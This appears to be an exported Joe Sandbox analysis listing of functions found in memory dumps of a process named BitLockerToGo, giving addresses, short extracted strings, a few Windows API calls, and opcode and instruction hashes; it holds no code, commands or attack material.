Instruction ID: 7c473237ec81981fcc3a3bffe590dea7688e293c06c02f46b8a0c07ec7f38010
Opcode Fuzzy Hash: dee1fa5feb881eae234c71569cf824fdc7569ced375766695008950f0f4d275c
Instruction Fuzzy Hash: 81C130B01093809BD711EF1AD884A2FBBEAEB96744F104D1DF5E48B252D375D908CBA7

Function 007078E0 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 621COMMON

Download Yara Rule

Strings

\A, xrefs: 00707FEE
(M, xrefs: 00707FE7
bq, xrefs: 00707F0B
tu, xrefs: 007079EA

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: (M$\A$bq$tu
API String ID: 0-1669698739
Opcode ID: 464c9a98d09e7981df21a91de4fcfb3a0525e089216544c723c0716be0fbee60
Instruction ID: d82fba88313dc7f251e1816a9d19db5356d5fbf81e90767397edfde36e90628b
Opcode Fuzzy Hash: 464c9a98d09e7981df21a91de4fcfb3a0525e089216544c723c0716be0fbee60
Instruction Fuzzy Hash: 5C3262B4909385EBE710DF55D980A2FBBF1BF86744F004A0CF4959B292D338E905CBA6

Function 0070D46E Relevance: 7.6, Strings: 6, Instructions: 81COMMON

Download Yara Rule

Strings

oB&V, xrefs: 0070D369
72O1, xrefs: 0070D379
Y", , xrefs: 0070D3E3, 0070D3E7
?s27, xrefs: 0070D381
Y,u[, xrefs: 0070D371
]ZS/, xrefs: 0070D359

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 72O1$?s27$Y", $Y,u[$]ZS/$oB&V
API String ID: 0-4052876082
Opcode ID: 6ef5e0cbf7f86a8166292293444334b2685e1662b1e29f194f398258afbd0d70
Instruction ID: 4076462d94b53ddf087165178b8035acb98b5eeeda97568cf17de6b6274087b6
Opcode Fuzzy Hash: 6ef5e0cbf7f86a8166292293444334b2685e1662b1e29f194f398258afbd0d70
Instruction Fuzzy Hash: 5F215AB2808381CFC720DF99E480A2FBBE4AB95705F544A1CF9D99B251C339E9418B97

Function 006E1379 Relevance: 7.2, Strings: 5, Instructions: 945COMMON

Download Yara Rule

Strings

@, xrefs: 006E292D
0, xrefs: 006E2573
i, xrefs: 006E2A4A
0, xrefs: 006E22FF
0, xrefs: 006E2238

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$0$0$@$i
API String ID: 0-3124195287
Opcode ID: f113030310b930fff7e0d3b99075cd6a1e700e66662979b59304469d52d23652
Instruction ID: 967385120acea0dbfcb76963ce9900c7ccdccfa49c7b4c5f6e6457478ca4b199
Opcode Fuzzy Hash: f113030310b930fff7e0d3b99075cd6a1e700e66662979b59304469d52d23652
Instruction Fuzzy Hash: 0C72F5716093828BC718CF2AC5A076BBBE7AFD5304F28892DE49587391D774DD4ACB42

Function 006E15E3 Relevance: 6.7, Strings: 5, Instructions: 402COMMON

Download Yara Rule

Strings

0123456789abcdefxp, xrefs: 006E15E7
gfff, xrefs: 006E204B
gfff, xrefs: 006E1FE5
+, xrefs: 006E1FA7
gfff, xrefs: 006E1FFA

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: +$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-2500819828
Opcode ID: d41dcc7d4c841abebcbbc37a20ea2df91326d02cfcde4151b0460291c82c50ba
Instruction ID: e2108ac04523b70910859df43dd8416a75e4c47f1aea897c6ad3e7da21509e83
Opcode Fuzzy Hash: d41dcc7d4c841abebcbbc37a20ea2df91326d02cfcde4151b0460291c82c50ba
Instruction Fuzzy Hash: ABE1C23170A3828BC718CE2AC4A466FBBE7AFD5304F18892DE486CB391D774D9469742

Function 006E13C1 Relevance: 6.6, Strings: 5, Instructions: 354COMMON

Download Yara Rule

Strings

0123456789abcdefxp, xrefs: 006E13C5
gfff, xrefs: 006E204B
gfff, xrefs: 006E1FE5
-, xrefs: 006E1FB0
gfff, xrefs: 006E1FFA

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-1507328263
Opcode ID: 8f67b9c663a7e079d64bbb05613bf9e20939c7583bc41e04bce8fa0bb2b970fb
Instruction ID: afc20bca7450404389230f109f0fae646544bd422798568e7361225ad30147ba
Opcode Fuzzy Hash: 8f67b9c663a7e079d64bbb05613bf9e20939c7583bc41e04bce8fa0bb2b970fb
Instruction Fuzzy Hash: 33D1A4716093C28FC319CE2AC49066AFBE3AFD5304F188A6DE499CB392D734D946C742

Function 00711AC3 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 975COMMON

Download Yara Rule

Strings

{htM, xrefs: 00712097

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: {htM
API String ID: 0-2558583750
Opcode ID: 097a8c192e55604f3777be8fb48bb90b27ff97696d8bdb7ce092d8d24823a854
Instruction ID: 62db2a1b6d6c00e933640d73ceec97f8e4c044fbcef1c2334df0b092e343491d
Opcode Fuzzy Hash: 097a8c192e55604f3777be8fb48bb90b27ff97696d8bdb7ce092d8d24823a854
Instruction Fuzzy Hash: 02628D701047818FD7268F29C450B62BBE1FF16315F58898DD8EA8B793D339E856CBA1

Function 00718247 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0071827D
GetSystemMetrics.USER32 ref: 0071828C

Strings

, xrefs: 00718337

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 24aca73626c0d75df85f8a9fc30988ffdf4f94007544393ca484b2c042d4c111
Instruction ID: 693fb80143bfb50253ecb9d31754736f73e8237d9c24570d841c2c024e405f07
Opcode Fuzzy Hash: 24aca73626c0d75df85f8a9fc30988ffdf4f94007544393ca484b2c042d4c111
Instruction Fuzzy Hash: 3E319DB09182408FDB50EF79E98461DBBF0BB88304F11892DE498DB361D778AD59CF86

Function 00706D6F Relevance: 4.5, Strings: 3, Instructions: 742COMMON

Download Yara Rule

Strings

KJML, xrefs: 00707368
J[, xrefs: 00706E97
!6, xrefs: 00706E7F

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: !6$J[$KJML
API String ID: 0-3728117715
Opcode ID: 698e4594b74c2e8c73a3676aad9fd158c7062b50a006c21e8226d473ef4ae75f
Instruction ID: 183e6f3d6c5c6bcc13b6a010250ec1945477eeadfcc5c012677cf9cc91493e6f
Opcode Fuzzy Hash: 698e4594b74c2e8c73a3676aad9fd158c7062b50a006c21e8226d473ef4ae75f
Instruction Fuzzy Hash: 9C42D175618342DFE718DF28D8A1A2AB7E1FF89305F498A2CF48587391D738E850CB85

Function 007113A6 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

;40&, xrefs: 007118B0
??8:, xrefs: 007118A9
0<)), xrefs: 007118B7

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0<))$;40&$??8:
API String ID: 0-1871281168
Opcode ID: dd3590fcda31472c4facc8d8383f4897a528cd358789837a10d27789bb7e82a1
Instruction ID: bdf857e46aa88ee0ab69df8965bc6a56a69c5909a3221ca68d3d0937b6470464
Opcode Fuzzy Hash: dd3590fcda31472c4facc8d8383f4897a528cd358789837a10d27789bb7e82a1
Instruction Fuzzy Hash: CA224AB48047809FD721EF29C146652BFB0AF12310F548A9DD8EA4F786D335E45ACFA2

Function 0070D4B0 Relevance: 4.2, Strings: 3, Instructions: 469COMMON

Download Yara Rule

Strings

@A, xrefs: 0070D8F6
4`[b, xrefs: 0070DAE0
x~, xrefs: 0070D56C

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$@A$x~
API String ID: 0-2557465156
Opcode ID: 19571d8f4c7b4ae948453e8d38e38c391c1b7a153341735814be7ba0c1196e17
Instruction ID: 0c0af51af79fa39b39278aedf33aec74b22b529b0d31f04ec03d1e38cd574106
Opcode Fuzzy Hash: 19571d8f4c7b4ae948453e8d38e38c391c1b7a153341735814be7ba0c1196e17
Instruction Fuzzy Hash: 1CF177B4508381DBE720DF98D840A5FFBF1AB85344F54891CF9C8972A2D778D989CB92

Function 00725643 Relevance: 3.8, Strings: 3, Instructions: 72COMMON

Download Yara Rule

Strings

%*, xrefs: 007256B0
:*, xrefs: 007256BE
3<, xrefs: 007256B7

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %*$3<$:*
API String ID: 0-1794941600
Opcode ID: 787361f6cba0f95fffa2a6fde60b3ff319db1349b6b4cc3fddfe8dea0234ea23
Instruction ID: bfe8ab586c78a3c15d90a6f4fa90a22bf6abd60c054437a550756d8ae814cec5
Opcode Fuzzy Hash: 787361f6cba0f95fffa2a6fde60b3ff319db1349b6b4cc3fddfe8dea0234ea23
Instruction Fuzzy Hash: F32104B6D117529FDB218F64FC4152EBFB2AF05306F54846CE081B7222D7399A05CB6A

Function 006FD1CC Relevance: 3.1, Strings: 2, Instructions: 637COMMON

Download Yara Rule

Strings

4`[b, xrefs: 006FD7E0
4`[b, xrefs: 006FD8B0

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b
API String ID: 0-3640500014
Opcode ID: d0a575f7619683948b12ad56827809f25d94331ab9fbb9a191b58687853eb4cc
Instruction ID: 35269ac49fdd98fe87c31f31a0c5c82be5560b779362da3427594301667f7acd
Opcode Fuzzy Hash: d0a575f7619683948b12ad56827809f25d94331ab9fbb9a191b58687853eb4cc
Instruction Fuzzy Hash: CC12A9B4201B05DFD7249F24C891BA2B7F2FF4A315F188918E6968BB91E735F851CB90

Function 006F3E12 Relevance: 3.0, Strings: 2, Instructions: 487COMMON

Download Yara Rule

Strings

&, xrefs: 006F42C0
pAo, xrefs: 006F414C

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: &$pAo
API String ID: 0-3345841933
Opcode ID: 5d937cefbea00ad1fbfc67604d12142c641c0631a605cb9f2be90967f109e057
Instruction ID: 0919cbb88774c6130d37c8ac9e9d35a99dca793cbd693c66a22f0eb2111ad89c
Opcode Fuzzy Hash: 5d937cefbea00ad1fbfc67604d12142c641c0631a605cb9f2be90967f109e057
Instruction Fuzzy Hash: A1F1BD719083419BD720DF28D880A2FBBF2EF96354F14482DF68997361EB36D945CB86

Function 006E3660 Relevance: 2.9, Strings: 2, Instructions: 419COMMON

Download Yara Rule

Strings

NaN, xrefs: 006E36BE
Inf, xrefs: 006E36B7

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Inf$NaN
API String ID: 0-3500518849
Opcode ID: e228cedc74c32569d4e0fb18b15941c530269ac39b62a551e50204573588ff36
Instruction ID: a9458b7bc691be1d2583e0acc33ece3659d487edf9490626c34e45690c81ee9b
Opcode Fuzzy Hash: e228cedc74c32569d4e0fb18b15941c530269ac39b62a551e50204573588ff36
Instruction Fuzzy Hash: 40D12672A093519BC704CF2AC88465BB7E6EFC8750F258A3DF8999B390E770DD458B81

Function 006E9442 Relevance: 2.9, Strings: 2, Instructions: 404COMMON

Download Yara Rule

Strings

0, xrefs: 006E9798
8, xrefs: 006E9790

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 2ec52437b1fa8f684b5dc90f5e8f67552f70ced89d15d21d9b3070eb62cf131f
Instruction ID: f75bb37b8af653e823ba23adb2ddf8f8a7115f386a00c889a1fc426b38d48e3e
Opcode Fuzzy Hash: 2ec52437b1fa8f684b5dc90f5e8f67552f70ced89d15d21d9b3070eb62cf131f
Instruction Fuzzy Hash: EA023575209380EFD754CF28D884A9ABBF1BF99304F08886CF98887362D775D965CB52

Function 006E9269 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

0, xrefs: 006E9798
8, xrefs: 006E9790

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: a9421b8e96f179459cd8088cb50e14a3e15a5f2f355bd45ebcf729425134a505
Instruction ID: 6021a8f731c5b2e04656a9b2777d5fea8581fed65f4741fc00ad30ad073734f7
Opcode Fuzzy Hash: a9421b8e96f179459cd8088cb50e14a3e15a5f2f355bd45ebcf729425134a505
Instruction Fuzzy Hash: 66E12575209380EFD754CF28D884A8ABBF2AFD9314F08886CF98987361C775D955CB52

Function 006F53E5 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

G, xrefs: 006F53E5
f, xrefs: 006F55F3

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: G$f
API String ID: 0-3568688445
Opcode ID: ae779696f1ea577757ec07f6d51ea48f007c31a592725237c982c67552aaeda4
Instruction ID: 01a60f9226ba8e773f057d8c49168b88442678978a5678629f2f180753b98298
Opcode Fuzzy Hash: ae779696f1ea577757ec07f6d51ea48f007c31a592725237c982c67552aaeda4
Instruction Fuzzy Hash: EFA10274408385AAD310DB18D885B6FFFF2EF86394F54881DF68997262E336D884CB56

Function 00716560 Relevance: 2.8, Strings: 2, Instructions: 270COMMON

Download Yara Rule

Strings

000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 00716802
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 007167ED

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 0-423013716
Opcode ID: 5a68c1b35f5b9829cac5818bd3e537c5a4a29884e0bd038aa3af06ecc3081709
Instruction ID: 4635a4ba262f4bf0d5d81a4bbefcf85601df30c1fed7b7aff474c042e244157a
Opcode Fuzzy Hash: 5a68c1b35f5b9829cac5818bd3e537c5a4a29884e0bd038aa3af06ecc3081709
Instruction Fuzzy Hash: 76912836E185918BCB199E3C8C513FD7BA39B56330F2D836DE8B29B3D5C22D484193A1

Function 0070E7F6 Relevance: 2.6, Strings: 2, Instructions: 72COMMON

Download Yara Rule

Strings

'M, xrefs: 0070E820
b, xrefs: 0070E827

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 'M$b
API String ID: 0-918009818
Opcode ID: 55b419b342ca2810cbdc4be0ad190cbbc92f16739811c3934e0049809e055b9f
Instruction ID: 961dd87a9f13ef1eb5d40b742e8e3bf767a1652f6c191dbcf74752bf661a490b
Opcode Fuzzy Hash: 55b419b342ca2810cbdc4be0ad190cbbc92f16739811c3934e0049809e055b9f
Instruction Fuzzy Hash: C5118B7150C380CBD311CF14909062AFBE5AF82701F28AD6DE5D15B2C2D37AD9188BA3

Function 006F2D20 Relevance: 2.1, Strings: 1, Instructions: 866COMMON

Download Yara Rule

Strings

ku, xrefs: 006F357D

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ku
API String ID: 0-3888063776
Opcode ID: 0d86cd0c0c87130da65315a1b653571517e3de14571c5ccbe195a84f08e28863
Instruction ID: aa3de40a4fce94799bddb9488ea2170c39a54662c8929a5f83ee4bf7eed01f2b
Opcode Fuzzy Hash: 0d86cd0c0c87130da65315a1b653571517e3de14571c5ccbe195a84f08e28863
Instruction Fuzzy Hash: 4742EE719083419BD710DF28D880A6FBBF6EF86354F14482CF68987362E735D985CB96

Function 006FFD80 Relevance: 2.0, Strings: 1, Instructions: 705COMMON

Download Yara Rule

Strings

+*), xrefs: 00700583, 0070058B

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: +*)
API String ID: 0-1463337533
Opcode ID: a23cd427a90c601e9245e0287ffa8922227e8af48f9bfb9197a501ddd3ed057f
Instruction ID: 03b7d61e77990229cb8fe4553f85095eb5fa72f2a0c204d2bf5973e442846bf8
Opcode Fuzzy Hash: a23cd427a90c601e9245e0287ffa8922227e8af48f9bfb9197a501ddd3ed057f
Instruction Fuzzy Hash: 7D2299B540C340DBD301AF18D891A6EBBF1EF96354F448A1CF5D48B2A2E3799944CBA7

Function 00723B90 Relevance: 1.8, Strings: 1, Instructions: 575COMMON

Download Yara Rule

Strings

f, xrefs: 00723D58

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
